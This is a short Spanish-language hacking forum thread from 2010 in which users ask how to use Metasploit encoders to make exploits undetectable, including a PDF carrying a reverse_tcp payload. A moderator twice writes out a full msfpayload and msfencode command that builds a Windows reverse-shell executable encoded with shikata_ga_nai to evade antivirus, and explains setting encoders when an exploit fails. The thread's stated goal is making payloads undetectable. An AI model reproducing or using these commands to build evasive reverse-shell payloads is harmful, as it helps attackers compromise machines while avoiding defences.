elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Encoders de Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Encoders de Metasploit  (Leído 6,570 veces)
illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Encoders de Metasploit
« en: 18 Febrero 2010, 12:06 pm »

Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Encoders de Metasploit
« Respuesta #1 en: 18 Febrero 2010, 17:31 pm »

mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
Código:
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.



Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD
En línea

Te vendería mi talento por poder dormir tranquilo.
alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: Encoders de Metasploit
« Respuesta #2 en: 23 Febrero 2010, 17:34 pm »

vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 
« Última modificación: 23 Febrero 2010, 17:46 pm por alexkof158 » En línea

"noproxy"
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Encoders de Metasploit
« Respuesta #3 en: 23 Febrero 2010, 19:00 pm »

Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
Código:
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Encoders a un payload binario en metaexploit
Hacking
dairus20 1 3,383 Último mensaje 28 Marzo 2011, 00:17 am
por dairus20
como se utilizan los encoders de metasploit? gracias
Bugs y Exploits
teloponeahi 3 5,908 Último mensaje 4 Marzo 2015, 23:29 pm
por ElP4nd4N3gro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines